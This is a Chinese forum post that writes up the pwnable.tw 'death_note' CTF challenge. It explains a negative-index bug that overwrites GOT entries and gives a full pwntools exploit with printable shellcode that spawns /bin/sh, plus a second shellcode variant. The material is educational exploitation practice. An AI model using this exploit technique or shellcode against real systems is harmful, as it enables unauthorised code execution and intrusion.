一、程序功能分析
最常见的功能:添加、展示、删除
橙色部分:漏洞点,只判断了大数,没有判断负数,导致可以负数溢出,相当于可以往上溢出(而不是往下)
红色部分:本题难点:需要写入的字符均为可打印字符
先说橙色部分:
note的地址在bss的0804A060,做题多了,就知道 got 表覆写也在这块,结合展示、删除功能,就知道可以覆盖到puts、free等函数地址,只需要算到对应偏移即可
[Asm] 纯文本查看 复制代码 #!/usr/bin/env python
# coding=utf-8
from pwn import *
debug = 1
online = 1
context(arch = 'i386', os = 'linux', log_level = 'debug')
context.terminal = ["tmux", "split", "-h"]
elf = ELF("./death_note")
if online == 0:
io = process("./death_note")
else:
io = remote("chall.pwnable.tw", 10201)
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True: io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
sn = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
dbg = lambda text=None : gdb.attach(io, text)
lg = lambda s,addr : log.info("\033[1;31;40m %s --> 0x%x \033[0m" % (s, addr))
uu32 = lambda data : u32(data.ljust(4, "\x00"))
uu64 = lambda data : u64(data.ljust(8, "\x00"))
def AddNote(index, name):
sla("Your choice :", "1")
sla("Index :", str(index))
sla("Name :", name)
def DeleteNote(index):
sla("Your choice :", "3")
sla("Index :", str(index))
def main():
free_got = 0x0804A014
note_addr = 0x0804a060
shellcode = '''
/*ebx '/bin///sh'*/
push 0x68
push 0x732f2f2f
push 0x6e69622f
push esp
pop ebx
/*edx 0xfffffffe --- dl 0xfe*/
push edx
dec edx
dec edx
/*0xcd 0x80*/
xor [eax+32], dl
xor [eax+33], dl
/*edx ecx 0*/
inc edx
inc edx
push edx
pop ecx
push 0x40
pop eax
xor al,0x4b
'''
AddNote(-19, asm(shellcode) + b"\x33\x7e")
DeleteNote(-19)
io.interactive()
if __name__ == "__main__":
main()
shellcode = '''
push ebx
push 0x68732f2f
push 0x6e69622f
push esp
pop ebx
push edx
dec edx
dec edx
xor [eax+36], dl
xor [eax+37], dl
pop edx
push ecx
pop eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
'''
参考链接:
https://p1kk.github.io/2020/09/10/tw/tw%20death_note/
https://blog.csdn.net/qq_43189757/article/details/103100883
| 
[复制链接]
发表于 2023-7-14 11:16
